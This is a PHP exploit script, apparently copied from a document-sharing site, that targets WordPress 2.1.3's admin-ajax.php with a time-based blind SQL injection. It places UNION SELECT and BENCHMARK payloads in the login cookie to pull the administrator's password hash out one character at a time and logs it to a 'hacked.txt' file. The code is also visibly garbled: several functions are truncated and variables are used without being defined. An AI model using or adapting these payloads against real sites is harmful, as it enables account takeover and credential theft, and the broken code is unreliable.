Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
php
error_reporting(e_all);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// wordpress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by janek vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './hacked.txt';// log file. ingat kasih chmod 777
$url = 'http://target_loe.xxx/wp-admin/admin-ajax.php';
$testcnt = 300000;// use bigger numbers, if server is slow, default is 300000
$id = 1;// id of the target user, default value "1" is admin's id
$suffix = '';// override value, if needed
$prefix = 'wp_';// wordpress table prefix, default is "wp_"
//======================================================================
if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}
$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";
$hash = get_hash();
add_line("target: $url");
add_line("user id: $id");
add_line("hash: $hash");
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where
id=%d and if(ord(substring($field,$pos,1))%s,benchmark($cnt,md5(1337)),3)/*";
if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;
while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();
return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";
return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;
// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where
id=%d and if(length(user_pass)>31,benchmark(%d,md5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();
return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers =
false)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, curlopt_url, $url);
curl_setopt ($ch, curlopt_returntransfer, 1);
curl_setopt ($ch, curlopt_connecttimeout, $timeout);
curl_setopt($ch, curlopt_post, 1);
curl_setopt($ch, curlopt_postfields, $post_fields);
curl_setopt($ch, curlopt_followlocation, 0);
curl_setopt ($ch, curlopt_useragent, 'mozilla/4.0 (compatible; msie 6.0; windows
nt 5.1; sv1; .net clr 2.0.50727)');
if(!empty($cookie))
{
curl_setopt ($ch, curlopt_cookie, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, curlopt_referer, $referer);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;
$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
?>